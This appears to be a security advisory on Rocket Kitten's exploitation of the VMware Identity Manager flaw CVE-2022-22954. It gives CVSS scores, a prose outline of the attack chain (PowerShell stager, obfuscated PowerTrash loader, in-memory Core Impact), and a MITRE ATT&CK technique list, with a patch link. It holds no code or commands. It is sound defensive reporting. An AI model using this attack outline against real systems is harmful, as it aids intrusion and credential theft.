9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
THREAT LEVEL: Red. For a detailed advisory, download the pdf file here An Iranian cyber espionage gang known as Rocket Kitten has began delivering the Core Impact penetration testing tool on susceptible computers by exploiting a newly fixed severe vulnerability in VMware Workspace ONE Access/Identity Manager program. Threat actors use the VMWare Identity Manager Service flaw (CVE-2022-22954) to acquire initial access to a target system, then install a PowerShell stager to download the next stage payload, nicknamed PowerTrash Loader. The PowerTrash Loader is a 40,000-line PowerShell script that has been substantially obfuscated. PowerTrash Downloader introduces the penetration testing framework Core Impact to memory at the end of the attack chain. The MITRE ATT&CK TTPs commonly used by Rocket Kitten are: TA0001: Initial Access TA0002: Execution TA0006: Credential Access TA0009: Collection TA0011: Command and Control T1059 - Command and Scripting Interpreter T1189 - Drive-by Compromise T1555.003: Credentials from Password Stores: Credentials from Web Browsers T1105: Ingress Tool Transfer T1056.001: Input Capture: Keylogging T1566.001: Phishing: Spearphishing Attachmet T1566.003: Phishing: Spearphishing via Servicen T1204.002: User Execution: Malicious File Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patch Links https://www.vmware.com/security/advisories/VMSA-2022-0011.html References https://blog.morphisec.com/vmware-identity-manager-attack-backdoor
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C